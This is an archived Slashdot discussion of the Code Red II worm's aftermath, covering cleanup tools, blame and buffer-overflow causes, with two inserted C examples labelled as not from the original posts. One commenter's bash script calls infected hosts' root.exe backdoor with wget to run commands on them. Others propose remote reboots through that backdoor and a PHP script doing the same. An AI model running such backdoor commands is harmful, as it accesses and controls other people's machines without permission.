Slashdot Mirror


Code Red: the Aftermath

LiquidPC writes: "Microsoft has released a tool to help clean up the effects of the Code Red II. It removes the files and mappings installed by the worm, and reboots your system; it also gives you an option to permanently disable IIS." So, Microsoft has given you a mop to clean up the mess they made. Start mopping! If you're not the one infected, just tired of seeing your Apache logs fill up, you might see this page.

505 comments

  1. But that doesn't help if... by Ungrounded+Lightning · · Score: 2

    The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.

    But the trojan modifications by the newer version of the worm are permanent, and will NOT be removed by rebooting and installing the patch. The patch just prevents reinfection by the original buffer overflow bug.

    Look here for a tool to TRY to clean up the system.

    But note that once the system has had the FIRST backdoor installed, that may have been used to install other backdoors, unknown to the author of the cleanout tool. And an infected machine is advertising its vulnerability to the entire net by the infection attempts it makes.

    The only real solution is to reinstall the whole machine, and install the patch before going live on the net.

    (And while you're at it - why not install Linux or a BSD instead, and switch to the Apache web server, which doesn't HAVE this problem.)

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
    1. Re:But that doesn't help if... by reverius · · Score: 1

      Hrm. Apparently I'm not well-versed on Code Red II as opposed to the original. I thought it would be all fixed with a reboot, but I guess there's more to it. Wasn't the whole point of the Microsoft fix to fix the whole thing? I guess your securityfocus.com link is unnecessary then.

      As for people who "might as well install linux or BSD and apache instead": that's not really possible. There are tons of people who have IIS installed by accident, and have never heard of this "Eunuchs" thing. ;)

  2. Re:Microsoft Assumes... by Anonymous Coward · · Score: 0

    That's alright. We Microsoft users love to reinstall Windows. It's the solution to just about every known Windows problem (according to Windows help desks everywhere!).

  3. Re:Here's how open source would be better... by cburley · · Score: 1, Insightful
    Fact: Free software (sometimes aka Open Source software) is typically released to the public after anyone in the world has had plenty of opportunity to examine the source code of that product, try it in beta installations, beat up on it, and openly and legally discuss its performance, security, usability, and other metrics.

    Fact: the same things almost never hold true for proprietary software.

    Fact: Free software does not "produce more secure software than the proprietary world" per se, though such a poorly-worded phrase is often used in place of the truth, which is that free software, compared to proprietary software, i.e. when comparing software distributed to end-users (as versus in-house use only), has a greater opportunity to reach high assurances of being secure when comparing categories of software in which security is important.

    For example, compare your personal ability to vet the security model of qmail vs. any of Microsoft's mail-server offerings. "They" can assure you of MS's "security", just as "we" can assure you of qmail's. But, of the two, only qmail allows you to legally examine the source before ever having to enter into a contract allowing you to do so; to discuss findings with others, out in the open; to beat up on it in a test installation before committing to a purchase (and remember that such purchase is typically followed by a strong urge to justify said purchase, rather than prove it to have been an incorrect decision); and so on.

    Fact: that "people with infected IIS are not admins" is irrelevant. Given MS's position in the marketplace, I suspect they could easily ensure that only true admins would be allowed to run IIS on the Internet. (After all, they use imposing legal language to bind "licensees" to contractual requirements designed to improve MS's bottom line and warm cuddly feelings of "protecting their IP", right?) At least, they could surely make it less likely that non-admins might "accidentally" deploy IIS on an Internet-exposed host. Why don't they do this? Because they prefer playing both ends against the middle, as most businesses do -- "anyone can buy and use our products" on the marketing end becomes, on the customer-service end, "you must be doing something wrong". (Yes, there are those who claim GNU/Linux is "ready for the desktop" and such like that. Why believe them? Why not investigate these claims for yourself? I claim that since everyone has the freedom to do that with free software, such claims have nowhere near the "guilt" for security breaches that a company like MS does when it makes similar claims about what, to most everyone else in the world, is a black box -- its proprietary software.)

    Fact: While it is indeed not always true that people are paid to fix free software, the exact same thing is the case for proprietary software.

    The difference is, if you're depending on a free-software product that isn't being maintained by someone for $$, you have the option of hiring someone to do the work.

    Whereas, if Microsoft decides, as it surely will down the road, to stop paying its programmers to fix IIS, or Windows 2000, or DOS 5.whatever, you'll be out of options if you have failed to follow the M$-recommended upgrade path.

    Fact: Red Hat does not, and has never, represented the security-conscious administrator's #1 choice for a default system installation of GNU/Linux.

    Fact: If you find Red Hat's choice of configuration (which I think has been improving lately; I've been using it for years) unacceptable, you have many other choices for where to obtain distributions, versions, and configurations of the Linux kernel specifically, the GNU system generally, and other free-software systems as well.

    Challenge: name three vendors from which you can obtain the Microsoft Windows 2000 or Windows NT kernel in a distribution as fundamentally different from Microsoft's as Debian's, or SuSE's, is from Red Hat's.

    Okay, make it two vendors. Okay, make it one vendor other than Microsoft. I'd sure love to know if they license their kernel to other software-distributor outfits to wrap with their own chosen apps, using their own chosen configurations, etc.

    (And note I haven't even mentioned OpenBSD yet!)

    Fact: to preserve their advantage in IP investment and security, proprietary-software distributors have an incentive to create packages as large, complex, monolithic, and, therefore, difficult-to-reverse-engineer, as possible. Free-software authors, like any software author, tend to create large, complex, monolithic programs due to natural tendencies, but they don't have nearly the bottom-line incentive to do so. That is, as their expertise, their sensitivity to security and complexity issues, might lead them to producing simpler, cleaner, more "transparent" products like qmail, they won't be rebuffed in their attempts to go down that road by managers and lawyers saying "we can't make it that easy on our competitors to reverse-engineer our IP".

    Consideration: most proprietary software, especially in wide (therefore profitable) circulation, especially the sort of software where Internet-exposed security is an issue, performs some kind of license-checking to prevent "piracy" ("unauthorized coveting of intellectual privilege" is IMO a better phrase), whereas hardly any free software does that sort of thing. Which choice poses a greater security risk to the overall system, in terms of things like resistance to viruses, worms, etc., degree of inviting reverse-engineering of obscured code, etc.?

    Opinion, mine: in the end, proprietary software stands opposed to secure software, because for software to be secure, it has to be easy to publicly validate as secure (i.e. be validated by any third party without contractual agreement, thus allowing that party to speak freely about security concerns), whereas, for that software to be usefully proprietary, it must be obscured, intentionally, by the distributor.

    Observation: The current method of choice proprietary software vendors use to obscure the IP they release into the wild is to compile and link it down to machine code and cross their fingers. With non-programming forms, they have to resort to even less workable forms, such as encryption. ("Less workable" because compiling to machine code generally makes the end product run faster, and because today's dominant software-development paradigm is predicated on the need to be able to strip out source and other "redundant" code, whereas encrypting other forms of software tends to make them less immediately useful to the end user, who then needs a more sophisticated engine to reveal the purchased IP.)

    That some vendors are increasingly resorting to the legal system, rather than on complexity alone, to keep their IP obscure, does not change my claims at all -- however the software is obscured, the very act of obscuring it defeats the goal of making it secure.

    (Though, as with firearms, to the degree laws are used to prevent access to source code, access to source code becomes something much more closely associated with those contemplating lawbreaking, rather than those merely very interested in learning about, and gaining expertise in, the relevant technologies. "When source code is outlawed, only outlaws [and government] will have source code." Think about the security implications of that situation, and ask whether you wish to visit houses, office buildings, and skyscrapers whose blueprints are "secured" in the same fashion.)

    --
    Practice random senselessness and act kind of beautiful.
  4. Re:FUD ALERT by dzeanah · · Score: 2, Informative

    Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass. Service pack 2 for NT Server made it so my machine rebooted the 2nd time I accessed a device on the floppy controller. Streamer or floppy -- first access is fine, 2 seconds after the 2nd access I was looking at a black screen and the PC was doing a POST (read: no shutdown, just an immediate reboot). SP3 fixed it, and it wasn't there pre-service pack. When I worked at a major law firm in Atlanta, our DC office had a ton of hard-to-reproduce problems related to the BDC over there. Turns out the admin installed SP4 when it came out because he trusted MS releases. Uninstalled to SP3 and it was solid as a rock. Put SP5 on and it was still great. SP6 sucked, but 6a was just fine (except it broke the way some NT boxes routed, apparently). So maybe the rule is to avoid even-numbered service packs.

  5. Re:Blame everyone bigger than you.! by bogado · · Score: 1

    It is partially Microsoft's fault that their user base is the way it is. They have a history of hiding options and complexity of their products to make them "user-friendly".

    Make a program that even an idiot will use, and only an idiot will use it.

    --
    []'s Victor Bogado da Silva Lins

    ^[:wq

  6. Re:You're dead wrong... by Anonymous Coward · · Score: 0
    Microsoft [...] installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

    Uhm, such as?

  7. Code Red & Others As Advocacy Tool by UberOogie · · Score: 2
    Yes, it is sort of off-topic. No, I do not advocate anyone writing viruses. Go to town, moderators.

    My point is this:
    MS is now on the brink of a win so big that they will be nearly be unstoppable, possibly even by the government, once it happens.

    This is, of course, .NET, which would give them a strangle-hold on ecommerce, and a hand in the pocket of nearly everyone on Passport.

    MS, and even Passport, have had huge security and service blow-ups in the past (Hotmail outages, etc.), and it hasn't even been a blip on the radar as far as most average people are concerned. It hasn't even registered on a corporate level, outside of the IT departments, who are just being blamed by the executives for not taking "proper care" of their single-platform fiats.

    Now, a high-profile virus that keeps going on and doesn't go away (like, for example, Code Red) and forces the public's attention on the issue and becomes a constant and increasing embarrassment to MS as it continually claims to have fixed the problem just before a new version shows up.

    Now, people have this in their heads, even if it is the wrong way. ("That evil Russian hacker wrote this awful virus that takes over my computer.") The point being, that even executives will start to notice it, and may take the time to read their half-page summary sheet on the problem that it only affects MS, especially their new products that they want everyone to upgrade to.

    Ultimately, only a sustained, media-covered security crisis will have any sort of effect on MS. Public opinion will only be turned when the average user is affected by it. It will happen after .NET launches and the first hack happens that compromises personal data, but it won't matter unless it happens *before* then.

    Just a thought.

    --
    "Enough of this wretched, whining monkey life." -- Marcus Aurelius, _Meditations_, Book 9, 37
    1. Re:Code Red & Others As Advocacy Tool by wadetemp · · Score: 1

      Damn, man, don't you think MS knows that? Where open source has its righteous sensibilities Microsoft has vicious media sensibilities.

      They KNOW if personal data gets compromised that they'll be in deep doodoo with the average user. I think they'll do almost anything to keep that particular feature secure... including not implementing it to the extent that the ".NET buzz" suggests it will be. Hailstorm is more hype than fact, especially from what I've seen working with the .NET beta components. It's just not there. It's not going to be anything more than Hotmail and MSN are now... because it's too much risk for MS to bear with their public.

  8. Re:Stop blaming microsoft by chris_sawtell · · Score: 1
    It's not so much the creators of C itself. It's a very good language. It's the fault of the design of the subroutine / function call & return mechanism. If one thing comes out of Code Red etc., it is for both the compiler & hardware designers to understand the need to separate the return addresses from the 'auto' data arrays & simple variables on the stack. Doing this would stop buffer overflow stack smashing attacks dead in their tracks. What a wonderful commercial opportunity. Stop the worms dead. Just fit this new CPU, $50 please. New O/S needed too, $500 please. New app. programs, $5000. Pay up before you press "start", or go to jail. Money for old rope. All that is needed is to install the new cpu, compiler, and C library on the development machines, and then type 'make'. Presto!

    Somebody tell William Gates III and Andy Groves how they're missing out on another umpteen Fort Knox fulls of money (and arrange a cent on each sale for me. :-) Might just rejuvenate the entire industry after the dot-bomb crash. If Bill actually does this, I will personally implore the Dept of Justice to stop hounding the world's latest Saint.

  9. Actually: authors of strncat() MAN PAGE and gets() by Ungrounded+Lightning · · Score: 5, Informative

    Blame the bozo who designed strncat!

    strncat() isn't a problem by itself. The problem is improper usage patterns.

    When you're building a string by repeated strncat()s to a buffer, and you don't have guarantees about the size of the things you're concatenating, you need to prevent (or check for) overflow, something like this:

    strncat(dest, src, MIN((BUFFSIZE-1)-strlen(dest), chars_wanted_from_src));

    Without such an example in the man page it's easy to forget to guard against buffer overflow. And once code is written with guards for overflow, the guard code will serve as a reminder to later programmers maintaining or upgrading the code.

    But strncat() isn't the main culprit.

    Most of the buffer overflow attacks come from reading an input using gets(). That bad boy should have had a buffer size argument, à la fgets(). And it's the decision to keep it in the standard library "for compatibility" that causes all the pain.

    The gnu compiler will warn you if you use it and the man page has a warning, so there's no excuse for it to show up in new code any more. And there's no excuse for not fixing ALL the warnings in a piece of production code, or for using (or writing) a compiler that DOESN'T warn about gets().

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
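The two guards the comment above argues for, as working C. This is an added example, not code from the original post; the function names (append_bounded, read_line, count_overlong_lines) and the sample input are my own. append_bounded is the strncat guard done with the bytes already in use (strlen, not sizeof, which for an array is the whole buffer and for a pointer is the pointer size), and read_line is the fgets() discipline that gets() never had: when a line is longer than the buffer it is truncated and the excess is drained so the next read starts on the next line rather than on the leftover bytes.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post: the two guards the
 * comment argues for, as working C. Function names and sample input are
 * my own. */

/* Append src to dest, where dest is a buffer of cap bytes that already
 * holds a terminated string. Never writes past dest[cap-1]. Returns 0 if
 * src fit, 1 if it had to be truncated, -1 if dest is not terminated
 * within cap bytes. Note: bytes in use (strlen), not sizeof. */
int append_bounded(char *dest, size_t cap, const char *src)
{
    const char *end = cap ? memchr(dest, '\0', cap) : NULL;
    if (end == NULL)
        return -1;
    size_t used = (size_t)(end - dest);
    size_t room = cap - 1 - used;           /* bytes left before the terminator */
    size_t need = strlen(src);
    if (need <= room) {
        memcpy(dest + used, src, need + 1); /* includes src's terminator */
        return 0;
    }
    memcpy(dest + used, src, room);
    dest[cap - 1] = '\0';
    return 1;
}

/* Read one line into buf (cap bytes) the way gets() should have worked.
 * Returns 0 at end of input, 1 if the whole line fit, 2 if the line was
 * longer than the buffer; in that case the excess is consumed and dropped
 * so the next call starts on the next line instead of the leftover bytes. */
int read_line(FILE *fp, char *buf, size_t cap)
{
    if (cap < 2 || fgets(buf, (int)cap, fp) == NULL)
        return 0;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    /* No newline in buf: either the buffer filled up or this is the last
     * line of the input. Peek at the next byte to tell which. */
    int c = fgetc(fp);
    if (c == EOF || c == '\n')
        return 1;
    while (c != EOF && c != '\n')
        c = fgetc(fp);
    return 2;
}

/* Constructed sample input: the second line is far longer than the
 * 16-byte buffer used below, which is exactly the case gets() cannot
 * handle. */
static const char SAMPLE[] =
    "GET /index.html\n"
    "GET /default.idaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n"
    "GET /robots.txt\n";

/* Feed SAMPLE through read_line with a 16-byte buffer. Returns how many
 * lines were over-long (truncated rather than overflowed); copies the
 * third line into third to show that reading resynchronised after the
 * long line. */
int count_overlong_lines(char *third, size_t third_cap)
{
    FILE *fp = tmpfile();
    if (fp == NULL)
        return -1;
    fputs(SAMPLE, fp);
    rewind(fp);

    char buf[16];
    int overlong = 0, lineno = 0, rc;
    while ((rc = read_line(fp, buf, sizeof buf)) != 0) {
        lineno++;
        if (rc == 2)
            overlong++;
        if (lineno == 3 && third != NULL && third_cap > 0) {
            third[0] = '\0';
            append_bounded(third, third_cap, buf);
        }
    }
    fclose(fp);
    return overlong;
}

int main(void)
{
    char path[12] = "/scripts/";
    int rc = append_bounded(path, sizeof path, "root.exe");
    printf("%s (truncated=%d)\n", path, rc);

    char third[32];
    printf("over-long lines: %d, last line read: \"%s\"\n",
           count_overlong_lines(third, sizeof third), third);
    return 0;
}
```

The return value of append_bounded is the part the man-page example leaves out: silently truncating is safer than overflowing, but a caller that builds a path or a command line from pieces usually needs to know that the result is not what it asked for.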
  10. Re:Stop blaming slashdot by Anonymous Coward · · Score: 0
  11. Service Pack MAXINT, step by step by leonbrooks · · Score: 2
    For a straight A: fix the problem forever by replacing NT with Linux...

    Shouldn't be too hard to alter one of the standard installers to:

    • Download a minimalist CygWin kit
    • Pull down a second-stage installer
    • Shrink a partition, live (might have to defrag first)
    • Add three new partitions in the shrinkage (swap, image, /var) using ReiserFS for the data partitions
    • Download and write a base Linux installation image into the image partition
    • Download and install suitable drivers for (e.g.) video card
    • Set up Linux config of network interfaces, DNS, webserver, video, etc from Windows config
    • Copy all active websites into /var/www
    • If any actually use ASP, download, install and use ASP2PHP on them
    • Make the service pack ingredients available via HTTP so that daughter sites can fetch from here instead of home base
    • Break all passwords and copy them across to PAM (invent a new root password)
    • Put the new root password on the default background wallpaper
    • Reboot into Linux, auto-login as root, and restore DNS/web service
    • Migrate all (in case something didn't translate) Windows data into /var/WASWINDOWS
    • Set up a listener at default.ida to react to future CodeRed probes
    • Go through the logs and process all attacking sites

    What have I forgotten?
    --
    Got time? Spend some of it coding or testing
  12. Re:What if by Gordonjcp · · Score: 1

    What, like BSD?
    I like BSD but it's bloody hard work to get HTTP, FTP, SSH, SMTP and POP3 to all play nice with a clean install... Maybe I'm just not very good at sorting it all out.

  13. Re:Not the mess they made... by maxxon · · Score: 1

    No kidding. Talk about egg on their faces. It's been known for months, there's no excuse for the damage being this bad.

    --
    max
  14. Re:Not the mess they made... by barnaby · · Score: 1

    More M$ Fud..

    It's not the OS, it's the incompetent Admin.

    --
    Barnaby
  15. Re:Stop blaming microsoft by Gordonjcp · · Score: 1

    Technically, yes, but he invented the idea of a stored-program machine where data and code share the same memory space.
    So, a Turing machine is *any* stored-program computer, a von Neumann machine is where program and data co-exist, and a Harvard machine is where program and data are entirely separate.

  16. You're dead wrong... by dsfox · · Score: 2

    ...about this not being Microsoft's fault. 90% of the machines running Code Red have no system administrators, because they are home machines whose owners have no idea they are even running a web server. Why? Because Microsoft, in its minuscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

    1. Re:You're dead wrong... by Tony-A · · Score: 1

      IIS is NOT installed by default on Win2K Pro. Now how exactly does that protect NT Workstation, NT Server, W2K Server, Advanced Server or Datacenter Server from Code Red.

    2. Re:You're dead wrong... by mpe · · Score: 2

      ...about this not being Microsoft's fault. 90% of the machines running Code Red have no system administrators, because they are home machines whose owners have no idea they are even running a web server. Why?

      End user administration appears to be one of Microsoft's central ideas. It's portrayed as making things "easier" to use and as a cost saver to corporate users. (In the case of the latter it can also increase costs because any idiot end user can mess things up...)

      Because Microsoft, in its minuscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

      Even though the workstation version of 2000 apparently does not install IIS by default. Rarely will machines just be running Windows...

    3. Re:You're dead wrong... by Anonymous Coward · · Score: 0
      When you install Win2k IIS is NOT (once again... IS NOT) installed by default, and can be installed later by using Add/Remove Programs in the control panel.

      It's installed by default with W2K Server, Advanced Server and Datacenter Server. It's not installed by default with W2K Pro...you have to go into Add/Remove Programs to install the "Personal Web Server" which is a cut-down version of IIS.

      I'm halfway through my MCSE and this is the behavior I have observed. And believe me, I have nuke/pave/reinstalled W2K more times than I can count.

    4. Re:You're dead wrong... by dsfox · · Score: 1

      It is true that it is not installed by default with the operating system, that is not what I said. It is installed with other applications.

    5. Re:You're dead wrong... by Anonymous Coward · · Score: 0

      Ummm.... Have you ever run Win2k? I guess not, as you have no clue about how it actually installs and simply repeat the crap you've heard here. When you install Win2k IIS is NOT (once again... IS NOT) installed by default, and can be installed later by using Add/Remove Programs in the control panel. Next time you feel like posting please think for a second and make sure you actually have a clue what you are talking about.

    6. Re:You're dead wrong... by Anonymous Coward · · Score: 0

      please give me an example of one piece of software that installs IIS automatically....

  17. Re:Stop blaming microsoft by Meech · · Score: 1

    Linux is written in C, and it doesn't have this problem?

    Something to think about ...

  18. Put the blame where it belongs by CAIMLAS · · Score: 2

    Everyone is saying, "blame MS", and "blame the virus writers," and/or "blame the trained monkeys." Everyone has it all wrong. All these people are responsible. MS is for having an OS that allows such exploits to be performed, and for telling people that it's easy and doesn't require skill to keep a server up and running (if you make it easy enough for a monkey to do something, monkeys will do it!). Second, the virus/worm writer, for writing it, and 3rd, the idiot monkeys for playing with something they don't have the skill to play with, and infecting each other. (Maybe like AIDS - people/monkeys play as they shouldn't, infecting each other... and everyone suffers for it.)

    --
    ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
  19. Re:If you've had a corporate hit on your network.. by nick-less · · Score: 1
    Those machines have probably been patched since infection, but have not been cleaned. The patch does not dis-infect Code Red from the machine, a lot of web admins don't realise this

    So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines don't bother us again.
    The root.exe left in their scripts directory would be their own problem.

    On the other hand, we could just broadcast the IPs to several IRC channels, and then see how long they keep up ;-)
  20. What is everyone else doing? by ekbond · · Score: 2, Interesting

    As a sysadmin for a couple of Linux web servers, I have been monitoring this site and others to see what everyone else is doing about CR. Up to now, I have gathered that the general feeling was one of moderation: ie., to try to notify the sysadmin of the offending site and wait until they patched or fixed their equipment.

    Now, the feeling seems to be shifting. According to this message and its threads, scripting a reply to reboot the machine is accepted as a response. I am still not comfortable with this but I am willing to go along with the group.

    What does everyone else feel about this?

    1. Re:What is everyone else doing? by J'raxis · · Score: 2

      I wish there was a command to remotely turn a Windows machine into a smoldering pile of burnt plastic and silicon. But that's just how I feel.

    2. Re:What is everyone else doing? by SpaceLifeForm · · Score: 1
      I wish there was a command to remotely turn a Windows machine into a smoldering pile of burnt plastic and silicon. But that's just how I feel.

      Well, there is a logical equivalent.
      Just call the FBI, tell them there is kiddie porn on the machine.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
  21. Re:Not the mess they made... by dsfox · · Score: 2

    What is the point of your message? Do you think
    posting it enough will make such lazy sysadmins
    go away?

  22. Notification script by Baloo+Ursidae · · Score: 1

    Another idea would be create a script...

    baloo@ursine:~$ cat redresponse.sh
    #!/bin/bash

    # Addresses already contacted, one per line
    CR_FILE="/home/baloo/CodeRed.hit"

    touch "$CR_FILE"

    # Source addresses that requested default.ida, minus those already on file
    grep default.ida /var/log/apache/access.log |
    cut -d " " -f 1 |
    sort -u |
    grep -vxF -f "$CR_FILE" |
    while read -r IP
    do
        echo "$IP" >> "$CR_FILE"
        wget --quiet -t 1 "http://$IP/scripts/root.exe?/c+start+http://ursine.dyndns.org/~baloo/patch.html" &
    done

    --
    Help us build a better map!
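The log-scanning half of the script above, and the point Blrfl makes further down this thread (a non-vulnerable server should just log the probe and 404 it rather than block thousands of hosts), in C. This is an added example, not code from the original posts; the host_t record, the scan_log and lookup names, and the log lines are my own, the latter constructed with documentation address ranges. It counts each source address once, splitting default.ida probes from requests for the /scripts/root.exe backdoor, which is what a notifier or a report to the owning network needs: one entry per infected machine, not one per hit.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original posts: scan Apache access-log lines
 * for hosts probing default.ida or calling the root.exe backdoor, counting
 * each source address once. Names and sample data are my own. */

#define MAX_HOSTS 64
#define IP_LEN 16          /* dotted quad plus terminator */

typedef struct {
    char ip[IP_LEN];
    int probes;            /* requests for default.ida */
    int backdoor;          /* requests for /scripts/root.exe */
} host_t;

/* Constructed sample log: two noisy hosts and one ordinary visitor. */
static const char SAMPLE_LOG[] =
  "192.0.2.10 - - [05/Aug/2001:10:01:02 -0400] \"GET /default.ida?XXXX HTTP/1.0\" 404 302\n"
  "203.0.113.5 - - [05/Aug/2001:10:01:05 -0400] \"GET /index.html HTTP/1.1\" 200 1543\n"
  "192.0.2.10 - - [05/Aug/2001:10:03:22 -0400] \"GET /default.ida?NNNN HTTP/1.0\" 404 302\n"
  "198.51.100.7 - - [05/Aug/2001:10:04:00 -0400] \"GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 289\n"
  "198.51.100.7 - - [05/Aug/2001:10:04:01 -0400] \"GET /default.ida?XXXX HTTP/1.0\" 404 302\n";

/* Find the record for ip, adding one if needed; NULL when the table is full. */
static host_t *lookup(host_t *tab, int *count, const char *ip)
{
    for (int i = 0; i < *count; i++)
        if (strcmp(tab[i].ip, ip) == 0)
            return &tab[i];
    if (*count >= MAX_HOSTS)
        return NULL;
    host_t *h = &tab[(*count)++];
    memset(h, 0, sizeof *h);
    strcpy(h->ip, ip);     /* caller guarantees ip is shorter than IP_LEN */
    return h;
}

/* Walk text line by line; fills tab with offending hosts and returns how
 * many there are. Each line is copied into a bounded buffer before any
 * string search, so an over-long line cannot run the search past the
 * line it belongs to. */
int scan_log(const char *text, host_t *tab, int *count)
{
    *count = 0;
    const char *line = text;
    while (*line != '\0') {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        char buf[512];
        size_t n = len < sizeof buf - 1 ? len : sizeof buf - 1;
        memcpy(buf, line, n);
        buf[n] = '\0';

        /* First field is the client address; IP_LEN or longer is not IPv4. */
        char *sp = strchr(buf, ' ');
        size_t iplen = sp ? (size_t)(sp - buf) : n;
        int probe = strstr(buf, "default.ida") != NULL;
        int bd = strstr(buf, "/scripts/root.exe") != NULL;
        if (iplen > 0 && iplen < IP_LEN && (probe || bd)) {
            char ip[IP_LEN];
            memcpy(ip, buf, iplen);
            ip[iplen] = '\0';
            host_t *h = lookup(tab, count, ip);
            if (h != NULL) {
                h->probes += probe;
                h->backdoor += bd;
            }
        }
        if (eol == NULL)
            break;
        line = eol + 1;
    }
    return *count;
}

int main(void)
{
    host_t tab[MAX_HOSTS];
    int count;
    scan_log(SAMPLE_LOG, tab, &count);
    for (int i = 0; i < count; i++)
        printf("%-15s default.ida=%d root.exe=%d\n",
               tab[i].ip, tab[i].probes, tab[i].backdoor);
    return 0;
}
```

A root.exe hit from a host that never sent a default.ida probe is worth separating out: that request is not the worm spreading, it is someone (or something) using the backdoor a Code Red II infection left behind on another machine.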
  23. What about Apache? by Anonymous Coward · · Score: 0

    http://www.apache.org/info/20010519-hack.html they were compromised... didn't see no FUD on that one over here.... by the way, IIS usage is up >5% from June, Apache is down, check netcraft.com. Sometimes this looks more and more like a FUD site than anything else, stick to the facts people and report ALL sides ok?

    1. Re:What about Apache? by Anonymous Coward · · Score: 0

      I don't know why you're such an ass to the point you didn't even read the article; we're talking about the same thing here. First of all, it was not the IIS daemon nor Apache that was exploited, it was Index Server and OpenSSH 2.2, same objectives, and that I know of, the MS patch was available before this whole mess came up, so I don't know about the waiting. Furthermore, if you did your homework you'd see there are ways to overcome the problem; if there was really a delay from Microsoft providing the patch, I could just write a filter for IIS and thus patch the problem... and don't tell me you could just dive into the Apache source to fix a problem, because that's just plain bullshit!

    2. Re:What about Apache? by rmgrotkierii · · Score: 1

      I have no idea why I am replying to an Anonymous Coward posting, but, here I am. This article is about the IIS daemon, and not the website! But how many times has it been reported that M$'s OWN website has been hacked? Too many, I've lost count :). themes.org was also hacked. So what if the Apache website was hacked? Are you THAT dense not to tell the difference between a WEBSITE and a Web DAEMON? Grow a fscking brain before spreading FUD against Apache/*NIX. Yes, Linux is just as hackable as Win*, but unlike Win*, you either can patch the system yourself or download the patches. For Win*, YOU have to WAIT for the official patch! Oh goodness, it's a closed source system and I can't patch the OS myself.

      --
      Reality is for those who can't face Science Fiction.
  24. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

    Why don't you just admit it: You like cock.

  25. Re:Blame everyone bigger than you.! by Anonymous Coward · · Score: 0

    Oh please unix has just as many security problems.

    OpenBSD is a little better, but it's mostly hype and a "l33"t image, not actually that much better in the real world.

    Oh ya let's not forget the Morris worm...

    You think there aren't tons of clueless Mandrake and Red Hat users who don't patch shit? Of course there are, and they get owned and used as a jump-off for more hax0ring activity. Per capita, I bet Linux and Solaris boxes are more likely to go unpatched.

    Oh and don't pretend FreeBSD is any better. If you look past the "l33t" image, it's just as crackable as anything else.

  26. Re:I would like to have sex with a teenage girl. by Anonymous Coward · · Score: 1, Funny

    cmdrtaco@slashdot.org

  27. Re:Stop blaming microsoft by blakestah · · Score: 5, Informative

    The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

    And were still vulnerable until we disabled URL forwarding.

    The Microsoft patch alone is not useful. You are still at risk. See Incidents home page

    I'm so sick of people blaming Microsoft. They released a patch well before Code Red. Get over it.

    Microsoft STILL hasn't released a patch that makes their webserver secure and allows URL forwarding. Their patch has its own security hole !!

    Blame Microsoft, or simply use Internet server software that is secure. All mine is written by Dan Bernstein :)

  28. Automatically block IP under IIS? by doublem · · Score: 2

    My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.

    While we're at it, can the net send command be used to inform the infected system of its "condition" without resorting to exploiting the Code Red II install of root.exe?

    Anyone have any ideas for using Perl or ASP to do this?

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
    1. Re:Automatically block IP under IIS? by Mike+Hicks · · Score: 2

      Well I have a PHP script that I've made, but I don't know if it works (I don't have any IIS boxes to test on).

      If you want to test it, find an IIS box. Shut off the default route, so nobody can hit you while you're doing this. Copy cmd.exe to root.exe in the scripts folder. Open a browser on the IIS box, and point it at default.ida?XXXXX on an Apache system running PHP and the script. If it works, it'll pop up a window on the IIS system.

      When you're done, remove root.exe, restore your default route.

    2. Re:Automatically block IP under IIS? by Blrfl · · Score: 1
      doublem writes:

      My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.

      My measly little class C's worth of addresses saw almost 11,000 Code Red attempts yesterday alone. Adding that many blocked hosts to IIS would most certainly bog it down to the point that nobody else would get in, either.

      If your server isn't vulnerable, why bother? Just process the request and 404 'em.

      If your server is vulnerable, consider getting it fixed instead of finding creative ways to create a denial-of-service attack on yourself. :-)

  29. start from scratch is a great idea! by Anonymous Coward · · Score: 0
    might I suggest saving lots of work in the future while you are at it?

    Debian
    or if you must have hand holding,
    Red Hat

  30. Re:Here's how open source would be better... by Anonymous Coward · · Score: 0

    You can buy your nice 2001 Accord from Acura. Although Acura is a subsidiary of Honda, the two are run financially independently of each other (think GM). The Acura TL lines up pretty closely with the Honda Accord. (I think they use the same frame/engine). Too bad you didn't choose a Chevy or Ford vehicle, I could guarantee you a different car with the same chassis/engine combination under a different brand name. Anyway. There's the answer to your challenge. Now tell me where I can buy the NT kernel in a different environment, please. (This is not the original poster, just someone who has already moderated and doesn't want their moderation points wasted)

  31. Re:Aftermath? by meldroc · · Score: 2

    It definitely isn't over - Code Red Vigilante still reports dozens of attempted Code Red II attacks. Hopefully, at least some of the decaffeinations get through and get people to patch their machines.

    Port 80 may still be blocked by @Home, but I'm still getting attacks from other @Home customers. When are @Home's admins going to start cutting off the connections of infected machines? It's drastic, but it seems to be the only way to get the attention of some people.

    --

    Meldroc, Waster of Electrons
  32. Microsoft PR by nontrivial · · Score: 1

    Finally Microsoft is getting the right kind of PR! I can't wait to see how Microsoft gets out of this one unscathed.

    --
    http://james.nontrivial.org
    1. Re:Microsoft PR by BorgDrone · · Score: 5, Interesting

      Actually, it might even be good PR for them too.

      this is what joe user will think:
